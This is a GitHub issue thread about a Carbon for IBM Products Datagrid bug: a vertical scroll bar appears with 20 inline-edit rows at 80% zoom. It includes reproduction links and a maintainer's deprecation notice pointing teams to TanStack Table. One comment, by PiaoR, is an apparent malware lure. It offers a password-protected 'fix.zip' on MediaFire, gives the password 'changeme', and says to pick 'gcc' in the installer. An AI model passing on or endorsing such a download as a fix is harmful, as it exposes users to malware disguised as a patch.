### ISSUE TITLE
[Datagrid]: when there are 20 inlineEdit records in Datagrid , the vertical scroll bar will appear.

### ISSUE THREAD

**Issue by WilliamSu2016** [carbon-design-system/ibm-products#5959]
### Package

Carbon for IBM Products

### Description

The vertical scroll bar of Datagrid will appear with below condition. 
1. set the browser to be Zoom=80%
2. there are 20 inlineEdit records in Datagrid . (someone meets this in 19 records).
   But the vertical scroll won't appear for 21 or 19 records. 
 
<img width="647" alt="image" src="https://github.com/user-attachments/assets/5269768d-4748-4808-9d13-39c82f37bb87">

### Component(s) impacted

https://codesandbox.io/p/devbox/crazy-resonance-ynpcyv?file=%2Fsrc%2FExample%2FExample.jsx%3A85%2C38

https://ynpcyv-5173.csb.app/

### Browser

Chrome, Firefox, Microsoft Edge

### @carbon/ibm-products (previously @carbon/ibm-cloud-cognitive) version

v2.47.0

### Suggested Severity

None

### Product/offering

bdmgt

### CodeSandbox or Stackblitz example

https://codesandbox.io/p/devbox/crazy-resonance-ynpcyv?file=%2Fsrc%2FExample%2FExample.jsx%3A85%2C38

### Code of Conduct

- [X] I agree to follow this project's [Code of Conduct](https://github.com/carbon-design-system/ibm-products/blob/main/.github/CODE_OF_CONDUCT.md)
- [X] I checked the [current issues](https://github.com/carbon-design-system/ibm-products/issues) for duplicate issues

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AlexanderMelox** [comment]
@WilliamSu2016 Can you submit a video? I'm trying to replicate the issue and can't get it to work. Thanks!

**Comment by WilliamSu2016** [comment]
@AlexanderMelox 

This link is for 20 records: https://ynpcyv-5173.csb.app/
This link is for 19 records: https://ynpcyv-5173.csb.app/

please see below for the video.
![Recording 2024-08-29 123554](https://github.com/user-attachments/assets/c69644d8-84a2-47b1-af0a-597ab8639209)

**Comment by ljcarot** [comment]
We've been investigating [TanStack ](https://tanstack.com/table/latest)[Table](https://tanstack.com/table/latest), a third-party, open-source offering, which provides extensive data table capabilities surpassing what our Carbon Datagrid offers. It provides much more flexibility and customization. TanStack Table is headless which means it can easily be added alongside Datagrid component in your product or application. The benefits of more flexibility for product teams and less maintenance for Carbon makes it a win win. Lastly, it is available in multiple frameworks including [React](https://github.com/carbon-design-system/tanstack-carbon/tree/main/react#readme) and [Web Component](https://github.com/carbon-design-system/tanstack-carbon/tree/main/web-components#readme) so it provides an option to non-React product teams.

For these reasons, we have decided to transition from building our own custom table component to using an example-based approach with TanStack Table. Datagrid will still exist in our library for existing teams but we are announcing the deprecation* of the Datagrid component in v2.54.0 release so teams can begin to work through the transition. Details about how to use both Datagrid and TanStack together can be found [here](https://github.com/carbon-design-system/tanstack-carbon/tree/main). 

*Deprecation means that no new features will be added however sev 1 and sev 2 bugs will be supported.
